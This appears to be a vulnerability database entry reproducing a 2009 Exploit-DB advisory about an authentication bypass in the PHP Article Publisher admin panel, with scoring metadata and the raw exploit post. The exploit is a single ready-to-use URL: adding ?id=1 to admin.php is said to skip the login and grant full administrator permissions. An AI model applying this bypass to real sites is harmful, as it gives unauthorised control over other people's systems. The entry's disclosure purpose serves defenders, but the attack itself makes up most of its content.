PHP Article Publisher Arbitrary Auth Bypass Vulnerability

vendor:

PHP Article Publisher

by:

ThE g0bL!N

7,5

CVSS

HIGH

Arbitrary Auth Bypass

287

CWE

Product Name: PHP Article Publisher

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Localhost

2009

PHP Article Publisher Arbitrary Auth Bypass Vulnerability

The path of the control panel is http://localhost/php_article_publisher/publisher/admin.php. The panel requires a username and password. The exploit is to enter http://localhost/php_article_publisher/publisher/admin.php?id=1, which will bypass the authentication and grant the user full permissions.

Mitigation:

Ensure that authentication is properly implemented and enforced.

Source

Exploit-DB raw data:

--------------------------------------------------------------
PHP Article Publisher Arbitrary Auth Bypass Vulnerability
---------------------------------------------------------------
Founder :ThE g0bL!N
download from:http://www.graugon.com/publisher/download.html
Thank You Very Much ahmadbady
Note: Jmaa asmehouna ala ihdae pcq thaghra meshi meliha :)
---------------------------------------------------------------
Exploit:
------
path of control panel is
http://localhost/php_article_publisher/publisher/admin.php
The panel Wanted Pass and user.
exploit is :
------------
http://localhost/php_article_publisher/publisher/admin.php?id=1
Boooom !!Control panel Bypassed
Then Return in Home page admin.php
Note:You have all permission :)
----
Note2: Tested On localhost
-----
----------------------------------------------------------------
Greetz : His0k4 &AhmadBady & Cyb3r-Dev!L
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]